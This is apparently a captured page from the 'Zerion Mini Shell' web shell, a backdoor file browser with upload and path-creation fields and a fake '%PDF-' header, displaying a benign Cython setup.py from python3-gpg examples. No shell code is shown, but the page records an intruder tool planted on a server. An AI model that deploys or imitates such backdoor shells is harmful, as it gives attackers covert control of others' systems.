%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/doc/python3-gpg/examples/howto/advanced/cython/
Upload File :
Create Path :
Current File : //usr/share/doc/python3-gpg/examples/howto/advanced/cython/setup.py

from distutils.core import setup
from Cython.Build import cythonize

setup(
    ext_modules = cythonize("keycount.pyx", annotate=True)
)

Zerion Mini Shell 1.0